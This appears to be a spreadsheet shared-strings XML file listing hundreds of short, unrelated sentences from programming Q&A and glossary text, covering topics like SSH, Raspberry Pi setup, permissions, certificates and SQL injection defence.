  <si>
    <t>Doctrine MongoDB Object Document Mapper provides transparent persistence for PHP objects to the MongoDB database.</t>
  </si>
  <si>
    <t>Dropbear is a software package that provides a Secure Shell-compatible server and client.</t>
  </si>
  <si>
    <t>If your code has an existing __autoload() function then this function must be explicitly registered on the __autoload stack.</t>
  </si>
  <si>
    <t>Surrogate vs. natural/business keys
Should I have a dedicated primary key field?</t>
  </si>
  <si>
    <t>An access control list (ACL) specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects.</t>
  </si>
  <si>
    <t>One should note that Twofish was one of the losing contestant to the AES competition, so the general cryptography community would likely recommend aes instead of twofish.</t>
  </si>
  <si>
    <t>Entity beans continue to be supported for backward compatibility.</t>
  </si>
  <si>
    <t>I updated the firebase-ui-auth to the version 3.1.0, with firebase 11.6.2, but that makes no difference.</t>
  </si>
  <si>
    <t>The trouble was severe enough that we were unable to obtain the certificate's common name and/or fingerprint.</t>
  </si>
  <si>
    <t>Edit: I logged in and out after adding myself to the new group, and I tried it after a reboot aswell.</t>
  </si>
  <si>
    <t>At the moment I have created a script which creates a login window which has no function what so ever.</t>
  </si>
  <si>
    <t>I tried many examples of the 'struct hack' but they all returned errors like this one:
That looked promising but I suspect my ignorance is glowing brightly.</t>
  </si>
  <si>
    <t>(to provide a graphic interface)  Some directories I want protected with a username and password.</t>
  </si>
  <si>
    <t>I enable this feature and protect write access on C drive.</t>
  </si>
  <si>
    <t>Instead, it creates a implicit function that matches the signature you used.</t>
  </si>
  <si>
    <t>Again, for security reasons the operating system's APIs are not accessible from web applications.</t>
  </si>
  <si>
    <t>Yes, root access sidesteps the problem of wrong device node properties, but it's not a proper solution at all.</t>
  </si>
  <si>
    <t>Browsers handle malformed code differently so you should check that.</t>
  </si>
  <si>
    <t>The IO class is protected from this edge case by issuing a runtime error.</t>
  </si>
  <si>
    <t>To add the required permissions, issue a chmod command:  which means "add +x(permission to execute) for all users (a) )</t>
  </si>
  <si>
    <t>I would invoke your script from 
Your script would run every time you login and a shell starts.</t>
  </si>
  <si>
    <t>An NSLock object can be used to mediate access to an applications global data or to protect a critical section of code, allowing it to run atomically.</t>
  </si>
  <si>
    <t>Once data elements are discovered they can be registered in a metadata registry.</t>
  </si>
  <si>
    <t>Be sure to submit valid CSS to UglifyCSS or you could get weird results.</t>
  </si>
  <si>
    <t>The way how it works is explained here: How can prepared statements protect from SQL injection attacks?</t>
  </si>
  <si>
    <t>By default, for security reasons all applications in Android run with their own uid and in different processes.</t>
  </si>
  <si>
    <t>The interrupts are obviously running quite quickly, and for some reason this is causing commands to become corrupted.</t>
  </si>
  <si>
    <t>Android code takes my key and uses a bunch of SecretKeys functions
on it to I think randomize it and make it more secure.</t>
  </si>
  <si>
    <t>I have tried disabling the firewall but it made no difference.</t>
  </si>
  <si>
    <t>What's strange is that I can SSH into the Yun using PuTTY, and call my python script manually, and that works.</t>
  </si>
  <si>
    <t>When I go to verify or compile any script, an error saying, "The system cannot find the file specified."</t>
  </si>
  <si>
    <t>I get the error:
Error NU1202  Package Google.Apis.Auth.AspNetCore 1.38.0 is not compatible with uap10.0.10586 (UAP,Version=v10.0.10586) / win10-arm-aot.</t>
  </si>
  <si>
    <t>this will authorize all functions to be called by a PHP script, you can adapt changing "ALL" by your script or Python command.</t>
  </si>
  <si>
    <t>Note that this is not very good code since some magic numbers are used.</t>
  </si>
  <si>
    <t>You get the  because you are trying to access the key attribute of the event object which doesn't exists.</t>
  </si>
  <si>
    <t>In production environments we recommend using certificate stores.</t>
  </si>
  <si>
    <t>The command line util UWFmgr seems to create an UWF_VOLUME wmi instance once you run the protect command.</t>
  </si>
  <si>
    <t>Common hash functions include MD5, SHA-1, SHA-256, SHA-512, and RIPEMD.</t>
  </si>
  <si>
    <t>I even made a script that posts in the Tavern when spam is detected.</t>
  </si>
  <si>
    <t>Also I foud few information on how to enroll the raspberry in EMM, is this possible by default with the user token in EMM or do I have to make any adjustments?</t>
  </si>
  <si>
    <t>The device is recognized by the raspberry (seen on the startup list of connected device).</t>
  </si>
  <si>
    <t>I forgot my password and now unable to reset it.</t>
  </si>
  <si>
    <t>I want to make it only executable for x user without having root permission.</t>
  </si>
  <si>
    <t>I am a little confused about  if it is what I need for logging in automatically.</t>
  </si>
  <si>
    <t>for the default user pi just enter:
sudo smbpasswd -a pi
Repeat the above command for each user you wish to add.</t>
  </si>
  <si>
    <t>So, to fool it, you need to record URLs the http probes from all devices are making.</t>
  </si>
  <si>
    <t>Note that it is "safe", at least within the function.</t>
  </si>
  <si>
    <t>So the  is a dictionary type and you need to use the param key which is your valid data.</t>
  </si>
  <si>
    <t>Please make WinRT type sealed.</t>
  </si>
  <si>
    <t>Also added mybitbucket.pub to authorized_keys, but can't connect to Raspberry from Xshell with SSH key for reason unknown to me.</t>
  </si>
  <si>
    <t>GreaseKit is a SIMBL plugin, that adds user scripting to Safari, Mailplane, Diet Pibb.app and all WebKit applications.</t>
  </si>
  <si>
    <t>Note: I take a simple example here, but there are some debug variables (for example, some variables DEBUG_GPS, DEBUG_IRIDIUM and others) that I would really like to print at board startup: I have quite a few of those debug options for separate components, and printing their status at startup would help keep track of which debuggings are activated or not (even if they are all gathered in a header file, it would not hurt to remember the user about all of them).</t>
  </si>
  <si>
    <t>Tested &amp; Ready to be used on production
Hoedown has been extensively security audited, and includes protection against all possible DOS attacks (stack overflows, out of memory situations, malformed Markdown syntax...).</t>
  </si>
  <si>
    <t>Earlier I added both scripts to .profile file so they will run on start-up and it work perfectly, but when I added new account and change sudoers to require password for sudo it stops working.</t>
  </si>
  <si>
    <t>You should examine 'cpu_map.h' for the pin/port assignments and you should also set up 'defaults.h' something like this:
Be careful, make good backups or check your code into a revision control system, something.</t>
  </si>
  <si>
    <t>You need to grant access to root user @ 192.168.0.4
To confirm, please check the current user and hosts who have access to login into the database using query:
If you want to give access to another user then use  command in sql as:
GRANT ALL PRIVILEGES ON &lt;database_name&gt; TO &lt;user&gt;@&lt;ipadress&gt;
This should resolve your problem</t>
  </si>
  <si>
    <t>Under normal conditions, these releases JSR expert groups to include a clarification, and useful solutions to improve the existing errors in the field of security in previous versions.</t>
  </si>
  <si>
    <t>The ease with which USML items can be exported and Retransferred using computer networks and removable media significantly increases the risk of unauthorized Retransfer of USML items.</t>
  </si>
  <si>
    <t>The file may also have some associated metadata such as access permissions, content type, and last-modification time; this class does not define methods for metadata access.</t>
  </si>
  <si>
    <t>Assuming I am on the right track, should I make a list of arrays of devices and check if the user entered a valid UUID in the array?</t>
  </si>
  <si>
    <t>I am using the simple main.c in /opt/vc/src/hello_pi/hello_font/main.c
I think the problem is here :
All files are here :
https://github.com/adafruit/rpi-firmware/blob/master/vc/sdk/opt/vc/src/hello_pi/libs/
gx_priv_render_text function is in font.c file .</t>
  </si>
  <si>
    <t>The value restriction prevents reference cells from holding values of different types and preserves type safety.</t>
  </si>
  <si>
    <t>In the end, I still see the intranet sites are listed as "Not secure" at the left side of the address bar.</t>
  </si>
  <si>
    <t>Google License Verification Library is used to ensure the current app has been purchased on Google Play by the current user.</t>
  </si>
  <si>
    <t>The EU Cookie Law is a peculiar law that requires website owners to show a warning about any cookies.</t>
  </si>
  <si>
    <t>It allows you to specify optionally typed schema of your MongoDB documents and automatically generates validation and Browsable API for them.</t>
  </si>
  <si>
    <t>System.DirectoryServices is the .NET library used to access Microsoft's Active Directory, which holds information about users, groups, computers, permissions and more</t>
  </si>
  <si>
    <t>Similar to other zombie processes, when enabled, NSZombies represents an object that has completed execution and has been released, but is later accessed again, usually causing an EXC_BAD_ACCESS error.</t>
  </si>
  <si>
    <t>The UI Spy tool enables developers and testers to view and interact with the user interface (UI) elements of an application.</t>
  </si>
  <si>
    <t>Generic classes and methods combine reusability, type safety and efficiency in a way that their non-generic counterparts cannot.</t>
  </si>
  <si>
    <t>In other words, when a foreign key value is used it must reference a valid, existing primary key in the parent table.</t>
  </si>
  <si>
    <t>An XML External Entity attack is a type of attack against an application that parses XML input.</t>
  </si>
  <si>
    <t>It allows you to specify (optionally) typed schema of your MongoDB documents and automatically generates validation and Browsable API for them.</t>
  </si>
  <si>
    <t>Documentation
eval in Ruby
eval in Bash
Disadvantages
Use of the eval function is generally considered to be bad practice, for a number of reasons:
Most importantly, it can cause severe security issues in any code that uses eval.</t>
  </si>
  <si>
    <t>Application Loader offers fast uploading, stable connections, and early validation warnings.</t>
  </si>
  <si>
    <t>However this forum discussion suggests that the current ESP8266 Micropython doesn't actually do what the docs say it does:
OK, so it seems that the watchdog is not fully implemented on the
  esp8266 as it is used internally.</t>
  </si>
  <si>
    <t>I also came across this thread which mentions explicit and implicit TLS/SSL, but I'm not quite sure if/how it relates to my problem.</t>
  </si>
  <si>
    <t>If you are using ESP (arduino IDE) library WiFiClientSecure.h, you need declare the "const" variable for fingerprint, like bellow:
So anyhow, these values can be obtained running the command
Result: 
SHA1 Fingerprint=9A:8E:2F:33:95:CA:72:4F:47:26:54:52:A4:E5:00:70:F0:BD:ED:85</t>
  </si>
  <si>
    <t>Executing SQL-statements in Transactions, can ensure data integrity and handle database errors.</t>
  </si>
  <si>
    <t>Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client.</t>
  </si>
  <si>
    <t>Custom tag types can be easily defined and registered for recognition by the parser.</t>
  </si>
  <si>
    <t>It doesn't protect your system against Python
security vulnerabilities: vulnerabilities in modules/functions available in
your sandbox (depend on your sandbox configuration).</t>
  </si>
  <si>
    <t>A user could use a dictionary or phone book or both to remotely come up with a list of valid usernames.</t>
  </si>
  <si>
    <t>If for some reason it keeps hanging, you can implement a watchdog timer mechanism.</t>
  </si>
  <si>
    <t>Since you did not do a protected call, Lua does not know how to handle the error and terminates right away (which is not a bad thing).</t>
  </si>
  <si>
    <t>You cannot use BIOS interrupts when the CPU is in protected mode, which all modern operating systems use.</t>
  </si>
  <si>
    <t>The reason you might want to do this is to avoid accidental construction that can hide bug.</t>
  </si>
  <si>
    <t>With free, easy to use encryption, we make secure email accessible to everyone.</t>
  </si>
  <si>
    <t>request-promise-any v1  Allows you to register any Promise library supported by any-promise.</t>
  </si>
  <si>
    <t>This would make it far more obvious that you are mapping /var/mercurial_repositories to hg when it comes to remote access.</t>
  </si>
  <si>
    <t>Please make sure you are using an open-ssh format compatible key'.</t>
  </si>
  <si>
    <t>Make sure proper write permissions exist for this location.</t>
  </si>
  <si>
    <t>https://secure.logmein.com/labs/#HamachiforLinux
I haven't added any new system in a while but here were the commands I typed.</t>
  </si>
  <si>
    <t>X can be set up to do authorization in different ways, but the most common is to have a file .Xauthority in your home directory which contains a token that is checked by the X server.</t>
  </si>
  <si>
    <t>An easy way I imagine is first making the python program connect via ssh to the pi you can to shutdown.</t>
  </si>
  <si>
    <t>Google-spreadsheet has a built in function (COUNTUNIQUE) that will count the unique entries in a range.</t>
  </si>
  <si>
    <t>PathJS enables routing URL hashes to functions in javascript.</t>
  </si>
  <si>
    <t>It's easier to assign permissions to db objects than to add guards in controllers.</t>
  </si>
  <si>
    <t>.docx is the new default Word format, it cannot contain any VBA (for security reasons as stated by Microsoft).</t>
  </si>
  <si>
    <t>Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient.</t>
  </si>
  <si>
    <t>However, I am getting the dreaded WME1039, saying I am not using a valid Windows Runtime Type.</t>
  </si>
  <si>
    <t>When trying to authorize access to the Google Assistant API from my Raspberry Pi, I get an error of SSLError type, stating that the certificate verification has failed.</t>
  </si>
  <si>
    <t>My make file is like that:
and an error occured like that:
/usr/arm-linux-gnueabihf/bin/ld: cannot find -lcurl
/usr/arm-linux-gnueabihf/bin/ld: cannot find -lcrypto
Also I tried to link with  -L/usr/lib/x86_64-linux-gnu/libcurl.so but it is still same error.</t>
  </si>
  <si>
    <t>I get a quite strange error message after executing Install-SecurityDaemon.</t>
  </si>
  <si>
    <t>(I realize that any RFID chip has pretty weak security.)</t>
  </si>
  <si>
    <t>But with more complicated JSON, that seems to be a lot of work to make sure a response is valid/existing)</t>
  </si>
  <si>
    <t>You now have access to static const variables that do the same, but are type safe.</t>
  </si>
  <si>
    <t>You just have to add your user account to the appropriate group, which probably is  for /dev/ttyACMx (this depends on the distro though).</t>
  </si>
  <si>
    <t>According to this datasheet, all the blocks are protected when BP2:0 is set to 5, 6, or 7.</t>
  </si>
  <si>
    <t>Since you're getting permission denied to run go as $USER, you may want to add the user into the group mentioned in ls -l. So, run the below.</t>
  </si>
  <si>
    <t>`protected` is an access specifier in object-oriented languages.</t>
  </si>
  <si>
    <t>A log file is a file that contains a list of events, which have been "logged" by a computer.</t>
  </si>
  <si>
    <t>Wifi Protected Setup (WPS) is a way of adding devices to a home network.</t>
  </si>
  <si>
    <t>To provide a way to operate the data in those properties, accessors are made.</t>
  </si>
  <si>
    <t>References
Lexical Scanning Strategies
CSS2.1: Lexical Scanner
CSS Syntax Module Level 3: Tokenization
The Lexical Analyzer Function yylex
tokenize: Tokenizer for Python source
PHP Tokenizer Functions</t>
  </si>
  <si>
    <t>Using this approach, one can make a macro that is syntactically verified during compilation.</t>
  </si>
  <si>
    <t>However, due to discordant views about the evolution of OAuth, Hammer left the working group.)</t>
  </si>
  <si>
    <t>The GNU assembler accepts the more-readable Intel mnemonics where the within-rax version always ends with e (except for cbw).</t>
  </si>
  <si>
    <t>It says: Exporting unsealed types is unsupported.</t>
  </si>
  <si>
    <t>I created a UWP-application which starts an external application over its EXE-File using the FullTrustedLauncher.</t>
  </si>
  <si>
    <t>If so, then we need to make sure that this feature is disabled.</t>
  </si>
  <si>
    <t>So, untested the correct code would be like this:
Make sure your  is valid JSON by verifying with e.g.</t>
  </si>
  <si>
    <t>Enables developer to add register/login functionality to the application with NetmeraUser API.</t>
  </si>
  <si>
    <t>Drivers are "dumb", migrate glues everything together and makes sure the logic is bulletproof.</t>
  </si>
  <si>
    <t>(You'll likely need to be root or prefix with sudo to add yourself to the group.)</t>
  </si>
  <si>
    <t>"C:\Program Files\Microsoft SDKs\Windows\v7.0A\Bin\signtool" verify /v myfile.cat
I get a list of certificates in "Signing Certificate Chain" starting with Verisign and a list in the Timestamp starting with Thawte Timestamping CA, but then an error saying:
SignTool Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.</t>
  </si>
  <si>
    <t>Since the result may be unpredictable (1-wire software driver is not terribly reliable on raspberry pi) I want to make the function a bit more bulletproof, catching all the possible cases of the console output.</t>
  </si>
  <si>
    <t>If you want to leave the hardware responsible for handling the co-existing devices (BL and WIFI), you can disable  and reduce the scan window and increase the scan interval of the BL to leave time for WIFI to get access to the antenna.</t>
  </si>
  <si>
    <t>The device is of type Vendor Defined so doesn't fall in the list of devices blocked on UWP (https://docs.microsoft.com/en-us/uwp/api/Windows.Devices.HumanInterfaceDevice)
I have written a report descriptor and it is currently being picked up by the Device Manager in Windows.</t>
  </si>
  <si>
    <t>on the server you have your http server running a small php script for each such request which receives the data, make some plausibility checks (and possibly an authentication) and then stores the data into some database.</t>
  </si>
  <si>
    <t>It's connected via GPIO to a magnetic door sensor, like one of these:
https://s3.amazonaws.com/assets.controlanything.com/photos/CKN6004-900.jpg
Here is the python code:
Anyways, for some reason, like maybe once a week, the alarm will get triggered falsely.</t>
  </si>
  <si>
    <t>Main Question: Aside from PRIMASK and global/individual enable register bits, what else could be preventing a pending interrupt from being executed?</t>
  </si>
  <si>
    <t>Here is my current function:
To give you the additional detail of what Encrypted_Data looks like:
When printing both errors to the terminal I see err1 = 0 and err2 = -0x0012, which is:
#define MBEDTLS_ERR_GCM_AUTH_FAILED -0x0012 /**&lt; Authenticated decryption failed.</t>
  </si>
  <si>
    <t>If you were using code that access the GPIO pins without using the sysfs interface you would need to expose whatever device node it is using inside the container, possibly with something like the --device argument to docker run.</t>
  </si>
  <si>
    <t>Finally this is My solved problems:
Paho client doesn't connect to nodejs ==&gt; disable firewall on windows 
error caused by on_connect function it need 4 parameters not 3 parameters like this 
thank you</t>
  </si>
  <si>
    <t>Using the SuiteScript APIs, core business records and user information can be accessed and manipulated via scripts that are executed at pre-defined events.</t>
  </si>
  <si>
    <t>I found these instructions and I followed:
-sudo apt-get install build-essential libssl-dev libffi-dev python-dev;
-sudo pip install cryptography;
After that, i have an error:
I tried the same code python into Eclipse on Windows machine and it works.</t>
  </si>
  <si>
    <t>There are all ready several blogs that set up raspbian headlessly by the addition of an ssh file in the boot directory and wpa_supplicant.conf in the  directory, but I am unsure how to achieve this in the NixOS way.</t>
  </si>
  <si>
    <t>The class is hidden part of frameworks, so it isn't exposed via the normal sdk API's that Apps use.</t>
  </si>
  <si>
    <t>Usually this is an almost mandatory rule to save you from attacks but for a Raspberry PI installation you may not have this problem so you can just add Apache user to sudoers (or, better, uso visudo to edit that file).</t>
  </si>
  <si>
    <t>We've put this all together into an ibeacon_scan script that does everything, including converting the raw identifiers into human-readable form.</t>
  </si>
  <si>
    <t>From MSDN:
Any public static (Shared in Visual Basic) members of this type are thread safe.</t>
  </si>
  <si>
    <t>This class is responsible to show the Form Commands and to handle device soft keys, back key, clear key, etc.</t>
  </si>
  <si>
    <t>A key issue in the definition of any ACL-based security model is determining how access control lists are edited, namely which users and processes are granted ACL-modification access.</t>
  </si>
  <si>
    <t>What does programming via the Arduino IDE hide (to make it simpler for the users) that makes it "not trusted" for commercial applications?</t>
  </si>
  <si>
    <t>If a device tries to connect using valid credentials already used by another device, then the first device will be disconnected, but beyond this, you can (and it is recommended) to implement some security strategy such as rolling secure keys regularly.</t>
  </si>
  <si>
    <t>Since web services are constructed differently from each other, AccountManager uses plugins (authenticators) in order to communicate with them.</t>
  </si>
  <si>
    <t>Meanwhile you have registered to monitor for connectivity changes, when the wifi is connected you re-enable your launcher activity.</t>
  </si>
  <si>
    <t>Constructing your insert statement this way lets psycopg convert the python values correctly to the DB format and provides protection from SQL injection attacks:</t>
  </si>
  <si>
    <t>QNetworkAccessManager class which holds the common configuration and settings for the requests it sends.</t>
  </si>
  <si>
    <t>The entire compiler source base should be audited for uses of __sync and replaced with the appropriate __atomic function.</t>
  </si>
  <si>
    <t>It is important to note that, in both cases, theoretical access to the USML items overseas or by foreign persons is sufficient to constitute a breach of ITAR.</t>
  </si>
  <si>
    <t>The code below goes through a Google API authentication:
On Windows 8.1 the output is as expected:
The same code running on the RPi crashes at the apiclient.discovery.build call.</t>
  </si>
  <si>
    <t>On the if statements, it keeps on giving me the error:
expected identifier before '(' token
I was banking on this to work.</t>
  </si>
  <si>
    <t>I think it could possibly come from the fact that the ip address I get from the command is a local one, but I don't know how to get the external, especially since the network of the server is well protected.</t>
  </si>
  <si>
    <t>Seems the older version breaks something on installing the python cryptography package.</t>
  </si>
  <si>
    <t>I have forgotten to generate a Base64 Key to add to the  Authorization: Basic headers.</t>
  </si>
  <si>
    <t>Since every Azure IoTHub is by default protected by Baltimore Certificate, I would like to use my own certificate but cannot manage to find how to do it and what should this new certificate respect.</t>
  </si>
  <si>
    <t>backported security fixes) so it is highly recommended you upgrade to a supported version.</t>
  </si>
  <si>
    <t>Both files have been made executable, and it doesn't matter if the daemon user is root or any other user.</t>
  </si>
  <si>
    <t>I going out on a limb and thinking it has to do with security-keys, but the constant looping of message in the shell makes me think otherwise.</t>
  </si>
  <si>
    <t>I noticed the RN42 is going into SDP protocol for some reason and not using the HID profile I set it to.</t>
  </si>
  <si>
    <t>You could, of course, use sudo to get around that - but that is extremely insecure and a very, very bad idea.</t>
  </si>
  <si>
    <t>The only thing you have to make sure of is that shell_exec isn't disabled in your server's php.ini file (look for the line disable_functions shell_exec).</t>
  </si>
  <si>
    <t>x can be, according to the docs:
0:Not need PIN Code (default)
1:Auth not need PIN   
2:Auth with PIN      
3:Auth and bond</t>
  </si>
  <si>
    <t>If you are using device tree add your i2c device details in .dts and let your driver invoked during bootup.</t>
  </si>
  <si>
    <t>(Make sure you disable character termination on Serial Monitor)</t>
  </si>
  <si>
    <t>The resulting token could be a variable name, class name or any other identifier.</t>
  </si>
  <si>
    <t>You should probably make it so that Read1.py can be run without sudo (having PHP be able to run passwordless sudo is a security problem).</t>
  </si>
  <si>
    <t>This gives
me the expected signed values through the Wire function.</t>
  </si>
  <si>
    <t>Its an immutable object initialized from a dictionary containing the cookie attributes.</t>
  </si>
  <si>
    <t>A well-built PKI uses many additional controls to mitigate risks of breach and of leakage in transit.</t>
  </si>
  <si>
    <t>all input elements to be validated must contain a unique name attribute.</t>
  </si>
  <si>
    <t>I am thinking to encrypt my code (written in python) and just ship the executable version.</t>
  </si>
  <si>
    <t>Check that the user you're logging in as has write permissions to that directory.</t>
  </si>
  <si>
    <t>Firstly please make shure the code you post is valid.</t>
  </si>
  <si>
    <t>There is no need to enclose .validate() inside of any click or submit handler.</t>
  </si>
  <si>
    <t>A job will fail to run if a username is added in crontab -e or omitted in /etc/crontab.</t>
  </si>
  <si>
    <t>The protocol specification distinguishes two major versions that are referred to as SSH-1 and SSH-2.</t>
  </si>
  <si>
    <t>Renaming is not the single function of an obfuscator.</t>
  </si>
  <si>
    <t>Finally, for security reasons, hash randomization is now switched on by default.</t>
  </si>
  <si>
    <t>This element contains one or more HID usage values.</t>
  </si>
  <si>
    <t>If I skip the login and call  or upgradeDom() after the app is added to dom, everything works as expected.</t>
  </si>
  <si>
    <t>It is executed regardless whether the user have logged in.</t>
  </si>
  <si>
    <t>It has many drawbacks, for example you can use only one handler and it doesn't have useCapture parameter.</t>
  </si>
  <si>
    <t>It's also important to note that proper logging was not implemented in this area of the code nor were exceptions properly caught, so the exception "OSError: Too many open files" was not being caught or logged making this a very mysterious issue.</t>
  </si>
  <si>
    <t>I have already added myself to the "dialout" and "uucp" groups, ran the "arduino" program as root, ran a whole bunch of commands dealing with permissions, restarted the computer, plugged it into all the ports, reinstalled the drivers, and tried everything else I came across.</t>
  </si>
  <si>
    <t>e.g 
char disp[2] = {}; // Declare disp...
disp[0] = '1';     // Write to disp...
disp[1] = '1';
disp[2] = '\0';
&amp; finally the webserver you're connecting too has DynDNS attached to the address, and anybody can access it without a password and anybody can start attacking it, so I would hide it.</t>
  </si>
  <si>
    <t>SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g.</t>
  </si>
  <si>
    <t>For these reasons central management of private crypto elements is best performed by a purpose built Public Key Infrastructure (PKI) management system.</t>
  </si>
  <si>
    <t>Some parts of the website may not be downloaded by default due to the robots exclusion protocol unless disabled during the program.</t>
  </si>
  <si>
    <t>One way of permanently turning on foreign_keys by default is to inject the following line into :
Please note that it will affect all your databases...</t>
  </si>
  <si>
    <t>(Note: This task can help me in verification of the same person at distant locations by storing these templates in r307 via Internet.)</t>
  </si>
  <si>
    <t>Checking the Linux kernel source code indeed one can see:
What this means is that the SCTLR.A bit is always cleared, so no trap
will be generated for unaligned accesses ARM v6 can handle.</t>
  </si>
  <si>
    <t>The class is initialized with a unique ID but then fills the rest of the variables out later in the code after some calculations.</t>
  </si>
  <si>
    <t>Making the Raspberry PI act as a USB storage device, exposing a media directory as browsable to the vehicle host.</t>
  </si>
  <si>
    <t>By default, unregistered component attributes are namely ignored during render response.</t>
  </si>
  <si>
    <t>It is important to note that commands executed this way will be run under the same permissions as the user that started the original process (i.e.</t>
  </si>
  <si>
    <t>In addition, the object file format is proprietary, and the operating system uses Intel "protected mode" to further increase defence against buffer overrun attacks.</t>
  </si>
  <si>
    <t>This class allows a common interface to encrypt extended ascii strings with various modes of operation.</t>
  </si>
  <si>
    <t>Read this security note for detailed TLS requirements and future compatibility.'</t>
  </si>
  <si>
    <t>You should provide the individual code for the positive edge detection and pwm since you said you can make them both individually work.</t>
  </si>
  <si>
    <t>Surely you can, Just make the serial communication object public and use it in any form.</t>
  </si>
  <si>
    <t>Derive from official code sample, it make  to avoid device OutputStream non-blocking.</t>
  </si>
  <si>
    <t>They can be used to force the implementation of necessarily used methods to assure the proper execution.</t>
  </si>
  <si>
    <t>SCE assists in writing code in way that (a) is secure by default and (b) makes auditing for security vulnerabilities such as XSS, clickjacking, etc.</t>
  </si>
  <si>
    <t>The lack of Wi-Fi certification does not necessarily imply a device is incompatible with Wi-Fi devices/protocols.</t>
  </si>
  <si>
    <t>Despite, I'm always compiling with sudo permissions, I created a .rules file, so I think there's not the problem.</t>
  </si>
  <si>
    <t>Just need to add your router ssid and the password on top of the sketch.</t>
  </si>
  <si>
    <t>I am using wolfSSL library for TLS version 1.2 and I am able to build the code successfully in OpenSTM32 environment.</t>
  </si>
  <si>
    <t>Tim points out an interesting hack that you might be able to get away with in making your device appear like a Bluetooth HID keyboard.</t>
  </si>
  <si>
    <t>):
Create another ssh key for the web server on the Debian server and add to allowed_keys on the PI.</t>
  </si>
  <si>
    <t>By default, the other user is root, and , with sudo, is one of the two common ways of obtaining administrator privileges.</t>
  </si>
  <si>
    <t>To prevent this from happening, MY_Model supports protected attributes.</t>
  </si>
  <si>
    <t>The toolchain works fine, but hen I run the executable on my Raspberry Pi, it fails with Illegal instruction.</t>
  </si>
  <si>
    <t>I think it ought to be possible, because  the device is getting the input from whomever is trying to log in and it needs to check out if it maches the login password, so there should be a way to get whatever he typed right?</t>
  </si>
  <si>
    <t>Is it possible to get Cognito Identity Id in the Lambda function?</t>
  </si>
  <si>
    <t>They go a step further and recommend using a revolving key strategy for added security.</t>
  </si>
  <si>
    <t>I have tried to run the script logged in via ssh, via vnc and also logged in straight to the raspberry pi (not via any remote connection).</t>
  </si>
  <si>
    <t>Hence an illegal instruction exception is exactly what I would expect.</t>
  </si>
  <si>
    <t>Rebuild and Publish the Function App
Login to Azure Portal and make sure that the values are there under the application settings.</t>
  </si>
  <si>
    <t>According to the documentation the username should be
 but in the example the version is missing.</t>
  </si>
  <si>
    <t>Please also make sure your code compiles by running mvn clean verify.</t>
  </si>
  <si>
    <t>As of December 27, 2015 the latest stable release of ModSecurity is version 2.9.0.</t>
  </si>
  <si>
    <t>By default add-ins are not enabled, and they need to be installed / activated.</t>
  </si>
  <si>
    <t>Before make these codes working you should make sure your settings of mac access control in file hostapd.conf is right.</t>
  </si>
  <si>
    <t>Note it passes all of the certificates in the chain.</t>
  </si>
  <si>
    <t>The permissions are categorized into different protection levels and groups.</t>
  </si>
  <si>
    <t>This should really be a comment to the accepted answer but my reputation is not high enough... Anyways, as noted in that answer there is a built in option for resetting the staticIP flag, but the trick to making it work is that the arguments need to be unsigned.</t>
  </si>
  <si>
    <t>Failed at the authblue-ui-ssr-spike@1.0.0 testcmp script 'node scripts/testcmp'.</t>
  </si>
  <si>
    <t>The file is most likely missing permissions to execute.</t>
  </si>
  <si>
    <t>This needs to be publicly accessible.</t>
  </si>
  <si>
    <t>But when I try to use the channel, the error "Invalid exchange" occurs
I tried two ways to use the service, with the rfcomm command and with the pybluez wrapper.</t>
  </si>
  <si>
    <t>The target is a doorlock with NFC as a key.</t>
  </si>
  <si>
    <t>Unknown, busy or no permissions' , ' Code . '</t>
  </si>
  <si>
    <t>If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.</t>
  </si>
  <si>
    <t>The leak is 3.50kb when it occurs.</t>
  </si>
  <si>
    <t>I cannot enable the Raspberry Pi Camera because I do not have Raspberry Pi firmware, so to speak.</t>
  </si>
  <si>
    <t>I have had an idea for a bash script on my Pi that uses espeak to say "I'm sorry $username, I'm afraid I can't let you do that", when you try to do something you don't have permission for.</t>
  </si>
  <si>
    <t>* [29.05.2016 19:51:46] System.InvalidCastException
        - Specified cast is not valid.</t>
  </si>
  <si>
    <t>Would it be possible to execute QtCreator as a nornal user but run and debug an application as root?</t>
  </si>
  <si>
    <t>(certificate and key files are in my working directory).</t>
  </si>
  <si>
    <t>I have alreay built the openvpn with cert and pptp vpn on my raspberrypi.</t>
  </si>
  <si>
    <t>Its there a way to disable this security?</t>
  </si>
  <si>
    <t>I saw that on some code examples, there were 'mqtt_password' and 'mqtt_user' fields.</t>
  </si>
  <si>
    <t>I'm currently trying to build a security system on my raspberry pi.</t>
  </si>
  <si>
    <t>I am trying to link my Watson IoT Platform with IBM Blockchain on Bluemix instance.</t>
  </si>
  <si>
    <t>But when I attach both of them I cannot access the network connected to the adapter.</t>
  </si>
  <si>
    <t>My Cognito user pool authentication works well, when I run that separately and I had seen a JWTToken as well.</t>
  </si>
  <si>
    <t>I'm trying to get a script to run at startup, but does nothing if I've connected to my Raspberry Pi via SSH.</t>
  </si>
  <si>
    <t>In buildroot I enabled the bt firmware.</t>
  </si>
  <si>
    <t>I am now trying to SSH via my macbook air (OS Sierra) and am using Gigaware USB to ethernet adapter.</t>
  </si>
  <si>
    <t>No .htaccess files used.</t>
  </si>
  <si>
    <t>One or more certificates rejected.</t>
  </si>
  <si>
    <t>Even the lambda code is the same (except for the IOT certificates and the IOT shadow URL).</t>
  </si>
  <si>
    <t>Remote session is enabled in cdm-config.xml file.</t>
  </si>
  <si>
    <t>However I am unable to log in from my java application to my MySQL Server.</t>
  </si>
  <si>
    <t>I would like to run a script after user login.</t>
  </si>
  <si>
    <t>I want to use a script on a PC for that and access them via SSH/SFTP.</t>
  </si>
  <si>
    <t>The RPi was used without a UI, I was ssh-ing to it for all the builds/runs.</t>
  </si>
  <si>
    <t>unfiltered_cxx_flag: "-Wno-builtin-macro-redefined"
    unfiltered_cxx_flag: "-D__DATE__=\"redacted\""
    unfiltered_cxx_flag: "-D__TIMESTAMP__=\"redacted\""
    unfiltered_cxx_flag: "-D__TIME__=\"redacted\""
    # Security hardening on by default.</t>
  </si>
  <si>
    <t>I executed Install-SecurityDaemon.</t>
  </si>
  <si>
    <t>If I run the C# program with Mono on the Raspberry Pi, the certificate is rejected.</t>
  </si>
  <si>
    <t>I'm using Amazon's recommended certificate from the Greengrass tutorial RSA 2048 bit key: Amazon Root CA 1.</t>
  </si>
  <si>
